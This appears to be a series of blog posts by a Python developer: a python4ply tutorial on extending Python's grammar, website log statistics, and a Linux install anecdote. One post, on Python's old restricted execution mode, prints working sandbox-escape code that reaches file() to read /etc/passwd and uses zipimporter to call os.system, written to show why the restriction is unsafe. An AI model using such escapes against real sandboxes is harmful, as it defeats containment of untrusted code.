  File "compile.py", line 43, in execfile
    tree = python_yacc.parse(text, source_filename)
  File "/Users/dalke/src/python4ply-1.0/python_yacc.py", line 2607, in parse
    parse_tree = parser.parse(source, lexer=lexer)
  File "/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/site-packages/ply/yacc.py", line 237, in parse
    lookahead = get_token()     # Get the next token
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 657, in token
    x = self.token_stream.next()
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 609, in add_endmarker
    for tok in token_stream:
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 534, in synthesize_indentation_tokens
    for token in token_stream:
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 493, in annotate_indentation_state
    for token in token_stream:
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 435, in create_strings
    for tok in token_stream:
  File "/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/site-packages/ply/lex.py", line 305, in token
    func.__name__, newtok.type),lexdata[lexpos:])
ply.lex.LexError: /Users/dalke/src/python4ply-1.0/python_lex.py:203: Rule 't_DECIMAL' returned an unknown token type 'DECIMAL'
The list of known token type names is given in the 'tokens' variable, defined at the top of python_lex.py. I'll add "DECIMAL" to the list
tokens = tuple(python_tokens.tokens) + (
    "NEWLINE",

    "NUMBER",
    "NAME",
    "WS",
    "DECIMAL",

    "STRING_START_TRIPLE",
    "STRING_START_SINGLE",
     ....

With that change I get a new error message. Whoopie for me!

% python compile.py -e div.py
Traceback (most recent call last):
  File "compile.py", line 76, in <module>
    execfile(args[0])
  File "compile.py", line 43, in execfile
    tree = python_yacc.parse(text, source_filename)
  File "/Users/dalke/src/python4ply-1.0/python_yacc.py", line 2607, in parse
    parse_tree = parser.parse(source, lexer=lexer)
  File "/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/site-packages/ply/yacc.py", line 346, in parse
    tok = self.errorfunc(errtoken)
  File "/Users/dalke/src/python4ply-1.0/python_yacc.py", line 2488, in p_error
    python_lex.raise_syntax_error("invalid syntax", t)
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 27, in raise_syntax_error
    _raise_error(message, t, SyntaxError)
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 24, in _raise_error
    raise klass(message, (filename, lineno, offset+1, text))
  File "div.py", line 3
    print "decimal", 0d1.0 % 0d0.1
                     ^
SyntaxError: invalid syntax
That's because the parser doesn't know what to do with a DECIMAL. What do you think it should do? The ast.Const node only takes a string or a built-in numeric value. It doesn't take general Python objects because those can't be marshalled into bytecode.

I'll wait a moment for you to think about it.

Thought enough? No? Okay, just a moment more.

This new token should correspond to making a new Decimal object at that point. You might think you could be more clever than that and create the decimals during module imports, like I will do for the regular expression definitions coming later on in this tutorial. That would make the object creation occur only once, instead of once for each function call or for every time through a loop. But a decimal object depends on a global/thread-local context, and if I move the decimal creation then I might create it in the wrong context.

To make my life easier, I'm going to import the Decimal class as the super seekret module variable "_$Decimal". This is a variable name that can't occur in normal Python (because of the "$") and which is hidden from "... import *" statements (because of the leading "_"). That way the object creation is mostly a matter of calling "_$Decimal(s)" in the right place, which I can only do by constructing the AST myself.

What will that look like? I'll use the compiler package to show what that AST should look like:

>>> import compiler
>>> compiler.parse("from decimal import Decimal as D")
Module(None, Stmt([From('decimal', [('Decimal', 'D')], 0)]))
>>> compiler.parse("Decimal('12.345')")
Module(None, Stmt([Discard(CallFunc(Name('Decimal'),
[Const('12.345')], None, None))]))
>>>

The new DECIMAL token can go anywhere a NUMBER and NAME can go. That's an "atom" in the Python grammar.

atom: ('(' [yield_expr|testlist_gexp] ')' |
       '[' [listmaker] ']' |
       '{' [dictmaker] '}' |
       '`' testlist1 '`' |
       NAME | NUMBER | STRING+)
The last three of these are defined in python_yacc.py as:
def p_atom_9(p):
    'atom : NAME'
    p[0] = ast.Name(p[1])
    locate(p[0], p.lineno(1))#, text_bounds(p, 1))

def p_atom_10(p):
    'atom : NUMBER'
    value, orig_text = p[1]
    p[0] = ast.Const(value)
    locate(p[0], p.lineno(1))#, (p.lexpos(1), p.lexpos(1) + len(orig_text)))

def p_atom_11(p):
    'atom : atom_plus'
    # get the STRING (atom_plus does the string concatenation)
    s, lineno, span = p[1]
    p[0] = ast.Const(s)
    locate(p[0], lineno)#, span)
They are simple because the AST nodes are designed for Python. Nearly every token type and statement type maps directly to an AST node. The "locate" function assigns a line number to each created node, and in the commented-out code you can see some of my experimental work to also assign a start and end byte location.

Here's the new definition for DECIMAL, which is a bit more complex because I need to call _$Decimal. Remember that I can't simply use an ast.Const containing a decimal.Decimal because the byte code generation only supports strings and numbers.

def p_atom_12(p):
    "atom : DECIMAL"
    decimal_string = p[1]
    p[0] = ast.CallFunc(ast.Name("_$Decimal"),
                        [ast.Const(decimal_string)], None, None)
    locate(p[0], p.lineno(1))

At this point running the code should fail because _$Decimal doesn't exist.

% python compile.py -e div.py
yacc: Warning. Token 'WS' defined, but not used.
yacc: Warning. Token 'STRING_START_SINGLE' defined, but not used.
yacc: Warning. Token 'STRING_START_TRIPLE' defined, but not used.
yacc: Warning. Token 'STRING_CONTINUE' defined, but not used.
yacc: Warning. Token 'STRING_END' defined, but not used.
/Users/dalke/src/python4ply-1.0/python_yacc.py:2473: Warning. Rule 'encoding_decl' defined, but not used.
yacc: Warning. There are 5 unused tokens.
yacc: Warning. There is 1 unused rule.
yacc: Symbol 'encoding_decl' is unreachable.
yacc: Generating LALR parsing table...
float 0.1
decimal
Traceback (most recent call last):
  File "compile.py", line 76, in <module>
    execfile(args[0])
  File "compile.py", line 48, in execfile
    exec code in mod.__dict__
  File "div.py", line 3, in <module>
    print "decimal", 0d1.0 % 0d0.1
NameError: name '_$Decimal' is not defined

Why are the 'yacc:' messages there? PLY uses a cached parsing table for better performance. When it notices a change in the grammar it invalidates the cache and rebuilds the table based on the new grammar. What you're seeing here are the messages from the rebuild.

Why is the exception there? Because the function call uses _$Decimal but that name doesn't exist. Why does it report line 3 even though I only assigned a line number to the ast.CallFunc and not the ast.Name, which is what actually failed? Because the AST generation code in the compiler module doesn't always assign line numbers, so the byte code generation step assumes it's the same as the line number for the previously generated instruction.

For extra credit, why does the following report the error on line 3 instead of line 1?

def p_atom_12(p):
    "atom : DECIMAL"
    decimal_string = p[1]
    p[0] = ast.CallFunc(ast.Name("_$Decimal"),
                        [ast.Const(decimal_string)], None, None)
    locate(p[0], 1)  # Why doesn't this report the error on line 1?

The last bit of magic is to import the Decimal constructor correctly. The root term in the Python grammar is "file_input". (There's another root if you're doing an 'eval'.) One case is for an empty file and the other is for a file that contains statements. The code as distributed looks like this:

def p_file_input_1(p):
    "file_input : ENDMARKER"
    # Empty file
    stmt = ast.Stmt([])
    locate(stmt, 1)#, (None, None))
    p[0] = ast.Module(None, stmt)
    locate(p[0], 1)#, (None, None))

def p_file_input_2(p):
    "file_input : file_input_star ENDMARKER"
    stmt = ast.Stmt(p[1])
    locate(stmt, p[1][0].lineno)#, bounds(p[1][0], p[1][-1]))
    docstring, stmt = extract_docstring(stmt)
    p[0] = ast.Module(docstring, stmt)
    locate(p[0], 1)#, (None, None))
By definition the empty file can't have any Decimal statements in it so I'll only worry about p_file_input_2. But I won't worry much. For instance, for now I won't worry that the file can contain __future__ statements. These must go before any statement other than the doc string. (If you really want to worry about that then feel free to worry. And also worry that in older Pythons "as" and "with" were not reserved words.)

I'll insert the new import statement as the first statement in the created module.

def p_file_input_2(p):
    "file_input : file_input_star ENDMARKER"
    stmt = ast.Stmt(p[1])
    locate(stmt, p[1][0].lineno)#, bounds(p[1][0], p[1][-1]))
    docstring, stmt = extract_docstring(stmt)
    stmt.nodes.insert(0, ast.From("decimal", [("Decimal", "_$Decimal")], 0))
    p[0] = ast.Module(docstring, stmt)
    locate(p[0], 1)#, (None, None))
That's it.

That was it?

Yes, that was it. Want to see it work?

% cat div.py
# div.py
print "float", 1.0 % 0.1
print "decimal", 0d1.0 % 0d0.1
% python compile.py -e div.py
float 0.1
decimal 0.0
% 
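
The two steps above (an injected "from decimal import Decimal as _$Decimal" and a call node for each literal) can also be sketched without python4ply. The following is only an illustration using the "ast" module from Python 3, which is an assumption on my part since the tutorial code targets Python 2.5 and the "compiler" module. The names "decimal_call", "namespace" and "result" are made up for the sketch, and the tree is built by hand because the stock parser cannot read "0d1.0".

```python
import ast


def decimal_call(text):
    # Python 3 counterpart of:
    #   ast.CallFunc(ast.Name("_$Decimal"), [ast.Const(text)], None, None)
    return ast.Call(
        func=ast.Name(id="_$Decimal", ctx=ast.Load()),
        args=[ast.Constant(value=text)],
        keywords=[],
    )


# from decimal import Decimal as _$Decimal
# The "$" is fine here because the name never goes through the tokenizer.
import_stmt = ast.ImportFrom(
    module="decimal",
    names=[ast.alias(name="Decimal", asname="_$Decimal")],
    level=0,
)

# result = _$Decimal("1.0") % _$Decimal("0.1")
assign = ast.Assign(
    targets=[ast.Name(id="result", ctx=ast.Store())],
    value=ast.BinOp(
        left=decimal_call("1.0"), op=ast.Mod(), right=decimal_call("0.1")
    ),
)

# The import goes first, just like the insert(0, ...) in p_file_input_2.
module = ast.Module(body=[import_stmt, assign], type_ignores=[])
ast.fix_missing_locations(module)  # plays the role of locate()

namespace = {}
exec(compile(module, "<decimal-sketch>", "exec"), namespace)
print("decimal", namespace["result"])
```

The hidden name ends up in the module namespace under the key "_$Decimal", which ordinary source code has no way to spell.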



python4ply tutorial, part 1 #

The following is an excerpt from the python4ply tutorial. python4ply is a Python parser for the Python language using PLY and the 'compiler' module from the standard library to parse Python code and generate bytecode for the Python virtual machine.

What is python4ply?

python4ply is a Python parser for the Python language. The grammar definition uses PLY, a parser system for Python modelled on yacc/lex. The parser rules use the "compiler" module from the standard library to build a Python AST and to generate byte code for .pyc files.

You might use python4ply to experiment with variations in the Python language. The PLY-based lexer and parser are much easier to change than the C implementation Python itself uses or even the ones written in Python which are part of the standard library. This tutorial walks through examples of how to make changes in different levels of the system.

If you only want access to Python's normal AST, which includes line numbers and byte position for the code fragments, you should use the _ast module.

Reminiscing, fabrications, and warnings

A long time ago I had a class assignment to develop a GUI interface using drawpoint and drawtext primitives only. Everything - buttons, text displays, even the mouse pointer itself - was built on those primitives. It gave the strange feeling of knowing that GUIs are completely and utterly fake. There's no there there, and it's only through a lot of effort that it feels real. Those that aren't as old and grizzled as I am might get the same feeling with modern web GUIs. Those fancy sliders and cool UI effects are built on divs and spans and CSS and a lot of hard work. They aren't really there.

This package gives you the same feeling about Python. It contains a Python grammar definition for the PLY parser. The file python_lex.py is the tokenizer, along with some code to synthesize the INDENT, DEDENT and ENDMARKER tags. The file python_yacc.py is the parser. The result is an AST compatible with that from the compiler module, which you can use to generate Python byte code (".pyc" files).

There's also a python_grammer.py file which makes a nearly useless concrete syntax tree. This parser was created by grammar_to_ply.py, which converts the Python "Grammar" definition into a form that PLY can more easily understand. I keep it around to make sure that the rules in python_yacc.py stay correct. You might also find it useful if you want to port the grammar directly to yacc or some similar parser system.

What this means is this package gives you, if you put work into it, the ability to create a Python variant that works on the Python VM, or if you put a lot of work into it (like the Jython, PyPy, and IronPython developers), a first step into making your own Python implementation.

If you think this sounds like a great idea, you're probably wrong. Down this path lies madness. Making a new language isn't just a matter of adding a new feature. The parts go together in subtle ways, and if you tweak the language and someone else tweaks the language a different way, then you quickly stop being able to talk to each other.

Lisp programmers are probably thinking now that this is just a half-formed macro system for Python. They are right. Once you have an AST you can manipulate it in all sorts of ways. But many experienced Lisp programmers will caution against the siren call of macros. Don't make a new language unless you know what dangerous waters you can get into.

On the other hand, it's a lot of fun. Someone has to make the new cool language for the future so you've got to practice somewhere. And there are a few times when changing things at the AST or code generation levels might make good sense.

Steve Yegge was right when he wrote "When you write a compiler, you lose your innocence."

Getting started

I'll start with the simple thing, to make sure everything works. Create the file "owe_me.py" with the following:

# owe_me.py
amount = 10000000
print "You owe me", amount, "dollars"
To bytecompile it use the provided "compile.py" file. This is similar to "py_compile.py" from the standard library.
% python compile.py owe_me.py
Compiling 'owe_me.py'
% ls -l owe_me.pyc 
-rw-r--r--   1 dalke  staff  165 Feb 17 19:21 owe_me.pyc
%
Running this is a bit tricky because the .pyc file is only used when the file is imported as a module. The easiest way around that is to import the module via a command-line call.
% python -c 'import owe_me'
You owe me 10000000 dollars
%
(I thought it would be best to use the '-m' option but that seems to import the .py file before the .pyc file. Hmm, I should check into that some more.)

If you want to prove that it's using the .pyc generated by this "compile.py", try renaming the file:

% rm owe_me.pyc
% python compile.py owe_me.py
Compiling 'owe_me.py'
% mv owe_me.pyc you_owe_me.pyc
% python -c 'import you_owe_me'
You owe me 10000000 dollars
%
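
The same rename trick can be sketched with only the standard library. This assumes Python 3 and the stock "py_compile" module rather than the "compile.py" from this package, and the temporary directory and the "message" variable are made up for the illustration. Because no "you_owe_me.py" exists, a successful import has to come from the .pyc file.

```python
import importlib
import os
import py_compile
import sys
import tempfile

# Write a small source file into a scratch directory.
workdir = tempfile.mkdtemp()
source_path = os.path.join(workdir, "owe_me.py")
with open(source_path, "w") as f:
    f.write("amount = 10000000\n")
    f.write('message = "You owe me %d dollars" % amount\n')

# Byte compile it straight to a differently named .pyc, which is the
# equivalent of compiling and then doing the "mv" shown above.
renamed_pyc = os.path.join(workdir, "you_owe_me.pyc")
py_compile.compile(source_path, cfile=renamed_pyc, doraise=True)

# Import by the new name. There is no matching .py file to fall back on.
sys.path.insert(0, workdir)
importlib.invalidate_caches()
module = importlib.import_module("you_owe_me")

print(module.message)
print(module.__file__)
```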
The compile module also supports a '-e' mode, which executes the file after byte compiling it, instead of saving the byte compiled form to a file.
% python compile.py -e owe_me.py
You owe me 10000000 dollars
%

Numbers like 1_000_000 - changing the lexer

Reading "10000000" is tricky, at least for humans. Is that 1 million or 10 million? You might be envious of Perl, which supports using "_" as a separator in a number

% perl
$amount = 10_000_000;
print "You owe me $amount\n";
^D
You owe me 10000000
%

You can change the python4ply grammar to support that. The tokenization pattern for base-10 numbers is in python_lex.py in the function "t_DEC_NUMBER":

def t_DEC_NUMBER(t):
    r'[1-9][0-9]*[lL]?'
    t.type = "NUMBER"
    value = t.value
    if value[-1] in "lL":
        value = value[:-1]
        f = long
    else:
        f = int
    t.value = (f(value, 10), t.value)
    return t

Why do I return the 2-tuple of (integer value, original string) in t.value? The python_yacc.py code contains commented out code where I'm experimenting with keeping track of the start and end character positions for each token and expression. PLY by default only tracks the start position, so I use the string length to get the end position. I'm also theorizing that it will prove useful for those doing round-trip conversions and want to keep the number in its original presentation.

Okay, so change the pattern to allow "_" as a character after the first digit, like this:

    r'[1-9][0-9_]*[lL]?'
then modify the action to remove the underscore character. The new definition is:
def t_DEC_NUMBER(t):
    r"[1-9][0-9_]*[lL]?"
    t.type = "NUMBER"
    value = t.value.replace("_", "")
    if value[-1] in "lL":
        value = value[:-1]
        f = long
    else:
        f = int
    t.value = (f(value, 10), t.value)
    return t

To see if it worked I changed owe_me.py to use underscores, and I changed the value to prove that I'm using the new file instead of some copy of the old:

# owe_me.py
amount = 20_000_000
print "You owe me", amount, "dollars"
% python compile.py -e owe_me.py
You owe me 20000000 dollars
%
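
If you want to try the pattern and the underscore removal without installing PLY, here is a small stand-alone sketch. It assumes Python 3 and the "re" module, and "parse_dec_number" is a made-up helper, not something in python_lex.py. It returns the same (value, original text) 2-tuple that the token action stores in t.value.

```python
import re

# Same pattern as the modified t_DEC_NUMBER docstring.
DEC_NUMBER = re.compile(r"[1-9][0-9_]*[lL]?")


def parse_dec_number(text):
    """Return (integer value, original text), like t.value in the lexer."""
    if DEC_NUMBER.fullmatch(text) is None:
        raise ValueError("not a base-10 number: %r" % (text,))
    digits = text.replace("_", "")
    if digits[-1] in "lL":
        # Python 3 has no separate long type, so just drop the suffix.
        digits = digits[:-1]
    return (int(digits, 10), text)


print(parse_dec_number("20_000_000"))
print(parse_dec_number("10L"))
```

Note that the pattern is permissive: it also accepts doubled or trailing underscores such as "1__0" and "1_". Tightening that is a design decision for whoever defines the language variant.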

Questions or comments?



python4ply #

python4ply 1.0

python4ply is a Python parser for the Python language. The grammar definition uses PLY, a parser system for Python modelled on yacc/lex. The parser rules use the "compiler" module from the standard library to build a Python AST and to generate byte code for .pyc files.

You might use python4ply to experiment with variations in the Python language. The PLY-based lexer and parser are much easier to change than the C implementation Python itself uses or even the ones written in Python which are part of the standard library. This tutorial walks through examples of how to make changes in different levels of the system.

To give you an idea of what it can do, here are some examples from the tutorial:

     # integers with optional underscore separators
amount = 20_000_000
print "You owe me", amount, "dollars"
      # syntax-level support for decimals
% cat div.py
# div.py
print "float", 1.0 % 0.1
print "decimal", 0d1.0 % 0d0.1
% python compile.py -e div.py
float 0.1
decimal 0.0
% 
      # Perl-like regex creation and match operator
for line in open("python_yacc.py"):
    if line =~ m/def (?P<name>\w+) *(?P<args>\(.*\)) *:/:
        print repr($1), repr($args)

The primary site for python4ply is http://dalkescientific.com/Python/python4ply.html. The package is released under the MIT license.

Download python4ply-1.0.tar.gz or view the tutorial.



    Restricted python #

    A long time ago there was the thought that Python could support a restricted execution mode, where untrusted code could be executed with limited capabilities. Quoting from the Python 2.2.3 manual:

    There exists a class of applications for which this "openness" is inappropriate. Take Grail: a Web browser that accepts "applets," snippets of Python code, from anywhere on the Internet for execution on the local system. This can be used to improve the user interface of forms, for instance. Since the originator of the code is unknown, it is obvious that it cannot be trusted with the full resources of the local machine.

    Restricted execution is the basic framework in Python that allows for the segregation of trusted and untrusted code. It is based on the notion that trusted Python code (a supervisor) can create a "padded cell" (or environment) with limited permissions, and run the untrusted code within this cell. The untrusted code cannot break out of its cell, and can only interact with sensitive system resources through interfaces defined and managed by the trusted code.

    In practice this didn't work out. By the time 2.3 came out the restricted execution documentation said:
    Warning: In Python 2.3 these modules have been disabled due to various known and not readily fixable security holes. The modules are still documented here to help in reading old code that uses the rexec and Bastion modules.
    There were a lot of tricks to get around the restrictions. Over time the simple ones were patched, but the problem is that the Python C implementation (and probably the Java and .Net ones) wasn't designed with security in mind. It's very hard to retrofit security.

    Some of the restricted environment code stayed in Python. Here's a snippet from the CVS version just before 2.6a1.

            /* rexec.py can't stop a user from getting the file() constructor --
               all they have to do is get *any* file object f, and then do
               type(f).  Here we prevent them from doing damage with it. */
            if (PyEval_GetRestricted()) {
                    PyErr_SetString(PyExc_IOError,
                    "file() constructor not accessible in restricted mode");
                    f = NULL;
                    goto cleanup;
            }
    
    The PyEval_GetRestricted() test checks to see if __builtins__ for the current frame is the same as the interpreter's standard builtins. If not, it's a restricted environment. Here's an example of the same code run in each environment:
    >>> exec """print [x for x in ().__class__.__bases__[0].__subclasses__()
    ...      if x.__name__ == 'file'][0]('/etc/passwd').read()[:60]"""
    ##
    # User Database
    # 
    # Note that this file is consulted whe
    
    
    >>> L = G = dict(__builtins__ = {})
    >>> exec """print [x for x in ().__class__.__bases__[0].__subclasses__()
    ...      if x.__name__ == 'file'][0]('/etc/passwd').read()[:60]""" in L, G
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
      File "<string>", line 1, in <module>
    IOError: file() constructor not accessible in restricted mode
    >>> 
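
    The reason the subclass walk works at all is that emptying __builtins__ only hides names. It does not hide the objects reachable from any literal. Here is a small sketch of that point, assuming Python 3 (where the restricted mode check no longer exists, so nothing at all stands in the way). The helper "name_is_visible" and the variable names are made up for the illustration.

```python
# A namespace with no builtins, like dict(__builtins__ = {}) above.
restricted_globals = {"__builtins__": {}}


def name_is_visible(name):
    """True if a bare name can be looked up inside the restricted namespace."""
    try:
        eval(name, restricted_globals)
    except NameError:
        return False
    return True


# Bare names such as open and len are gone ...
print(name_is_visible("open"), name_is_visible("len"))

# ... but starting from an empty tuple the code can still climb to
# `object` and list every direct subclass the interpreter knows about.
walk = "[cls.__name__ for cls in ().__class__.__bases__[0].__subclasses__()]"
reachable_type_names = eval(walk, restricted_globals)
print(len(reachable_type_names), "types reachable")
```

    Any type in that list with a useful constructor or method is a potential way out, which is why patching individual constructors never closed the hole.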
    

    Today I saw the recently contributed Python Cookbook Recipe which "create[s] a restricted python function from a string." Sounds nice so I looked at it. It basically uses what's left of the old rexec code, which is known to be untrustworthy for the general case.

    For the person who posted the code it's probably good enough, but the recipe doesn't include the strong warnings I thought were needed. I added a comment, and to strengthen the comment decided to come up with an attack using the default recipe and without using any passed in variables.

    I came close. If I know the location of an egg which has already been loaded and which contains a reference to the 'os' module then I can get access to os.system through the zipimporter type. One such common module is 'configobj'.

    # Example attack code using the zipimport type to get around Python's
    # restricted mode checks.
    
    # Must import this otherwise zipimporter will fail because zlib can't
    # be found.  (Reading another zip file fixes that, but then the import
    # fails because it can't find __import__)
    import configobj
    
    
    attack_code = """
    
    all_types = ().__class__.__bases__[0].__subclasses__()
    file = [x for x in all_types if x.__name__ == "file"][0]
    
    # Prove that I'm in restricted mode, or that I'm running
    # on a non-unix-based machine.  This step is optional
    try:
        file("/dev/zero")
    except:
        pass
    else:
        assert "Was able to open a file!"
        1/0
    
    zipimport = [x for x in all_types if x.__name__ == "zipimporter"][0]
    
    # Easiest case would be on a system with a python*.zip file
    # because I could import os directly this way.
    
    egg = ("/Library/Frameworks/Python.framework/Versions/2.5/lib/"
           "python2.5/site-packages/configobj-4.4.0-py2.5.egg")
    loader = zipimport(egg)
    configobj = loader.load_module("configobj")
    os = configobj.os
    
    print "system call:", os.system("ls")
    
    """
    
    
    L = G = dict(__builtins__ = {})
    exec attack_code in L, G
    
    This contains comments and some code to verify that I'm really running in restricted mode. Take that out and the attack code is an expression that doesn't need to be exec'ed and which doesn't use any passed in variables.
    [x for x in ().__class__.__bases__[0].__subclasses__()
       if x.__name__ == "zipimporter"][0](
         "/Library/Frameworks/Python.framework/Versions/2.5/lib/"
         "python2.5/site-packages/configobj-4.4.0-py2.5.egg").load_module(
         "configobj").os.system("ls")
    

    I considered reporting this as a bug to the Python maintainers, in case there was thought to slowly patch problems like this, but then noticed Python 3's "NEWS" file says

    - Remove the f_restricted attribute from frames. This naturally leads to the removal of PyEval_GetRestricted() and PyFrame_IsRestricted().
    Goodbye and good riddance. It won't confuse people into thinking it does something useful when it doesn't.



    Log analysis of my website #

    I write these essays in part as a promotional activity. I'm a consultant, and expect people to find out more about what I do through reading what I've written.

    I've wondered if it's been useful, but have put off doing the analysis of my website. At first it was because I didn't have enough essays to do interpretable analysis. And then I just put it off. At the German Chemoinformatics Conference I talked to quite a few people, mostly grad students, who had gotten information from my site. That was enough to make me finally do some analysis.

    I used awstats, chosen based on doing some web searches. I wanted something that could analyze my Apache logs and could generate static pages. There are other tools but since awstats did what I wanted I didn't try anything else.

    So far this year I've had 1.1 million "hits", which corresponds to 330,000 page views. A "hit" includes images, so a page view can have multiple hits because of CSS, images, and other embedded content. Another nearly 500,000 page views come from web spiders and other identifiably non-people requests. That's more page requests from robots than from people. All told, I use less than 20GB of bandwidth per year. I use pair Networks for my hosting. My basic account allows 400GB/month of transfer. I'm not even close.

    Of the robots, Yahoo Slurp pulled down 1.6 GB, MSNBot 810 MB and Googlebot 290MB. Google's RSS reader took 80MB, Bloglines 7MB and UniversalFeedParser 5MB. Of the users, 64.5% use Windows, 17% use Linux, 11.5% use Macs, and jumping over the BSD and Solaris users, a full 88 requests came from an IRIX machine. The browser stats are 45% Firefox, 33.5% IE, 4% each Mozilla and Firefox, 3% Opera.

    Top hit (no surprise) is my RSS feed, viewed 82,000 times this year. Including by aggregators so translate as you wish. Next was my LOLPython page, which wasn't a surprise. I wrote it deliberately because of the then high popularity of lolcats and lolcode. It got 17,500 views. About 1,200 downloads from people who weren't me.

    The next two were surprising. I did a series of lectures for the NBN. These were for the most part graduate students in biology, going into computational biology, who needed more programming training. The page on Javascript validation got 7,300 hits and the one on threads in Python got 5,800. My screen scraping page was also popular, at 5,600 views.

    Going further down the list:

    I do a lot of work with cheminformatics, but that's the details. In most cases my topic is more general, like how to write a C extension for Python (that just happens to use a chemistry toolkit). The highest cheminformatics specific hit is my article on SMILES tokenization, with 1,500 hits. Most of the links come from Wikipedia's SMILES page. My most popular bioinformatics page is on BLAST parsing at just under 1,400 hits.

    You can easily see that most people who come to my pages are there because of popular topics of the day (LOLPython, wide-finder) or general computing questions (threading, validation, HTML templates, Python, ANTLR). Very few came to my pages for cheminformatics reasons. Then again, there are very few people doing cheminformatics.

    The top search phrases were:

    Yes folks, 2,000 people came to my site for one image I have of a use case, from a 10 minute presentation I gave at a bioinformatics conference trying to convince people that usability analysis is important. I don't think it had any effect. No one came to my site searching for information on OEChem.

    60% of the pages come from "direct address or bookmarks", 31% from search engines, and 10% from referrers. The top referrer is lolcode.com, then Pythonware's Daily-URL (probably lolpython), followed by the already mentioned wide-finder (via the effbot) and the ANTLR home page. programming.reddit.com linked to my lolpython page, and the matplotlib cookbook links to my page showing how to use matplotlib without a GUI.

    Lastly, hostname analysis. Who is 207.172.151.225? That's registered to the RCN Corporation and resolves to 207-172-151-225.c3-0.gth-ubr1.lnh-gth.md.cable.rcn.com. They sucked down 780 MB of my 20GB. All to read my RSS file every hour. Whoever it is doesn't know how to make an If-Modified-Since request, as they are downloading the entire thing (usually unchanged) every time. How do I complain?

    The next hog is NewsAlloy through 207.230.13.10 which has downloaded 450 MB, and makes full requests every 20 minutes. I emailed them this:

    Your RSS reader at 207.230.13.10 , identified as "NewsAlloy/1.1 (http://www.NewsAlloy.com; 1 subscribers)" is taking up 5% of my upload bandwidth. While that's only 400MB/year, the underlying reason is because your service doesn't send the tags needed to handle HTTP conditional get. My server should only need to return a 304 Not Modified for most cases, rather than the 200 Ok (along with over 100K of content). You poll every 20 minutes, so that adds up.

    You would decrease your bandwidth use by quite a bit - perhaps an order of magnitude - by adding support for conditional GET requests. See for example: http://fishbowl.pastiche.org/2002/10/21/http_conditional_get_for_rss_hackers .
    I admit: I do this partially to see what happens. I got an answer within a few hours. They said it shouldn't have happened and asked for more details. Looking into it further I see that whoever subscribed via their service unsubscribed a few months ago. NewsAlloy hadn't made a request since then.

    I don't know who uses NewsAlloy. I will say that they had very responsive service.
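
    For those who haven't seen conditional GET from the client side, here is a minimal sketch of what a polite feed reader could do. It assumes Python 3 and the standard "urllib" package. The function names "build_conditional_request" and "fetch_if_changed" are made up for the illustration, and the validators are whatever ETag and Last-Modified values the reader saved from its previous successful download.

```python
import urllib.error
import urllib.request


def build_conditional_request(url, etag=None, last_modified=None):
    """Build a GET request carrying the validators saved from the last fetch."""
    headers = {}
    if etag:
        headers["If-None-Match"] = etag
    if last_modified:
        headers["If-Modified-Since"] = last_modified
    return urllib.request.Request(url, headers=headers)


def fetch_if_changed(url, etag=None, last_modified=None):
    """Return (body, etag, last_modified). The body is None on 304 Not Modified."""
    request = build_conditional_request(url, etag, last_modified)
    try:
        with urllib.request.urlopen(request) as response:
            return (
                response.read(),
                response.headers.get("ETag"),
                response.headers.get("Last-Modified"),
            )
    except urllib.error.HTTPError as err:
        if err.code == 304:
            # Nothing changed, so keep the old validators and skip the download.
            return (None, etag, last_modified)
        raise
```

    A reader would store the returned validators next to its cached copy of the feed and pass them back in on the next poll, so an unchanged feed costs a few hundred bytes of headers instead of the full document.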

    Next on the list, at only 6MB is my ISP. This is me checking things on my server, and my home page is my web site. After that is a friend (I recognized the domain name) at 4MB. He's configured his RSS reader to poll every 30 minutes.

    Looking for hosts in my field, I see 2,000 requests from a biotech in England. Ah-ha, it's one person, reading this from a machine with "Windows-RSS-Platform/1.0 (MSIE 7.0; Windows NT 5.1)". Hi!

    There are 700 page requests from the rest of pharma. 200 from one site (all through Google searches finding my PyDaylight work) and 100 from another site.



    Installing Linux #

    Forenote: Glyph wrote me wondering how I managed to get things so messed up. He wrote

    First, let me tell you how this whole mess is _supposed_ to go. You put in the install disk, it brings up a nice graphical display. It asks you for your target disk - which the installer *does* see. You can then use the full OS (pidgin, gimp, emacs, python, whatever you like) while the installation takes place in the background. There's a menu, which looks like a cell phone "bars" icon, and works more or less like the Airport menu, for setting up wireless. You definitely shouldn't have to type "dhclient3" on the command-line! I've probably installed ubuntu 30 times over the past 2 years, and modulo a few minor problems with nvidia cards giving me distorted resolutions, it has always worked that way.
    I have no idea about the hard drive issue, but it sounds like your post-installation woes were likely caused by using the "server" installation CD instead of the "desktop" one.
    Thinking backwards, that's almost certainly what happened. When I went to the Ubuntu page there was the option of "desktop" or "server". I wanted to install servers like Apache and MySQL. I figured a desktop machine is for people who want a web browser and some applications, while I wanted gcc, the unix command-line tools, etc. that I would use when developing servers. Plus, it says that the LTS server version gets longer support - 5 years instead of 3 for the desktop. (I did not get the LTS version; I'm explaining how I decided to choose 'server' over 'desktop'.) I figured that was the case because the end-user applications change more frequently than the relatively stable development software.

    Nothing on the Ubuntu page described the difference between desktop and server. That's changed. If you look at the page now you'll see that the "desktop" option shows a picture of a laptop, the "server" option shows some rack mounted machines, and there are links for each saying "learn more". This changed about 10 minutes ago because when I started writing this update it still had the old layout. Looking back through archive.org's history, it seems the lack of a "learn more" was an anomaly. Eg, you can see it exists in the snapshots from: 12 June 2007 and 10 Jan 2007. Archive.org lists nothing between June and now. A-ha! At least for now you can see what used to be on the front page here, or here's a screenshot to show I wasn't being a complete ignoramus:

    Grrrrrrrrr......!


    Pipeline Pilot is a visual dataflow system with a domain focus in computational chemistry. Because of its very strong marketing background and good technology, it's made a big noise in the small domain I work in. I happen to dislike dataflow systems and think its popularity is a measure of how generally unusable (in the HCI sense) chemistry software is. And again, marketing works.

    Pipeline Pilot is a big scary monster to some of the other vendors. As a result, Knime, which is a dual-licensed free/commercial package from a university group, also with a chemistry focus, is itself getting some attention. A few people have asked me if I've looked at it, and I haven't. But I'm a consultant and perhaps it's something I should know about so people will give me money.

    Which reminds me, I do more than consult for computational chemistry, so if you're looking for an experienced Python developer based in Göteborg, Sweden, email me. (After the fact: but obviously don't hire me as a system administrator :)

